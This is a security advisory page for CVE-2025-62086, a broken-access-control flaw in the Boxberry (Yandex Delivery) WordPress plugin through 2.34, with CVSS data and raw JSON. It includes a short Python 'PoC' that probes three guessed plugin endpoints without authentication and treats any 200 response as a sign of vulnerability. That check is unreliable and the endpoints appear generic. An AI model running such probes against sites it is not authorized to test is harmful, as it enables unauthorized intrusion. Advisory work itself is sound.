Security Vulnerability Report
中文
CVE-2025-62086 CVSS 5.4 MEDIUM

CVE-2025-62086

Published: 2025-12-09 16:18:01
Last Modified: 2026-04-27 17:16:32

Description

Missing Authorization vulnerability in akazanstev Яндекс Доставка (Boxberry) boxberry allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Яндекс Доставка (Boxberry): from n/a through <= 2.34.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

boxberry插件 <= 2.34

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62086 PoC - WordPress boxberry Plugin Broken Access Control # Target: WordPress site with boxberry plugin <= 2.34 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-62086 """ # WordPress REST API endpoint for boxberry endpoints = [ '/wp-json/boxberry/v1/settings', '/wp-admin/admin-ajax.php?action=boxberry_save_settings', '/wp-admin/admin-ajax.php?action=boxberry_update_order' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/json' } for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Test without authentication or with low-privilege session response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print(f'[+] Potential vulnerable endpoint found: {url}') print(f' Status: {response.status_code}') return True elif response.status_code == 403: print(f'[-] Protected endpoint: {url}') except requests.exceptions.RequestException as e: print(f'[!] Error accessing {url}: {e}') return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-62086.py <target_url>') print('Example: python cve-2025-62086.py http://example.com') sys.exit(1) target = sys.argv[1] print(f'[*] Scanning {target} for CVE-2025-62086...') check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62086", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:00.503", "lastModified": "2026-04-27T17:16:31.863", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in akazanstev Яндекс Доставка (Boxberry) boxberry allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Яндекс Доставка (Boxberry): from n/a through <= 2.34."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/boxberry/vulnerability/wordpress-yandeks-dostavka-boxberry-plugin-2-32-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}